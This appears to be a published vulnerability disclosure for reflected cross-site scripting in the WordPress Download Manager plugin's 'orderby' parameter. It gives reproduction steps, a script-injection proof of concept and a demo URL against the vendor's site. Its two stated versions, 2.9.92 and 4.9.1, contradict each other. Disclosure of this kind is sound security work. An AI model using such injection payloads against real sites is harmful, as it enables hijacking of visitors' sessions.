WordPress Download Manager plugin version 2.9.92 suffers from a cross site scripting vulnerability.
bb8b5efd41990f8b6901e44dfe22b53d
* Exploit Title: WordPress Download Manager Cross-site Scripting
* Discovery Date: 2019-04-13
* Exploit Author: ThuraMoeMyint
* Author Link: https://twitter.com/mgthuramoemyint
* Vendor Homepage: https://www.wpdownloadmanager.com
* Software Link: https://wordpress.org/plugins/download-manager
* Version: 4.9.1
* Category: WebApps, WordPress
Description
--
In the pro features of the WordPress download manager plugin, there is a Category Short-code feature witch can use to sort categories with order by a function which will be used as ?orderby=title,publish_date .
By adding parameter "> and add any XSS payload , the xss payload will execute.
To reproduce,
1.Go to the link where we can find ?orderby
2.Add parameters >” and give simple payload like <script>alert(1)</script>
3.The payload will execute.
--
PoC
--
<div class="btn-group btn-group-sm pull-right"><button type="button" class="btn btn-primary" disabled="disabled">Order </button><a class="btn btn-primary" href="https://demo.wpdownloadmanager.com/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=asc">Asc</a><a class="btn btn-primary" href="https://demo.wpdownloadmanager.com/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=desc">Desc</a></div>
--
Demo -:https://demo.wpdownloadmanager.com/wpdmpro/category-short-code/?orderby=publish_date%22%3E%3Cscript%3Ealert(11)%3C/script%3E&order=desc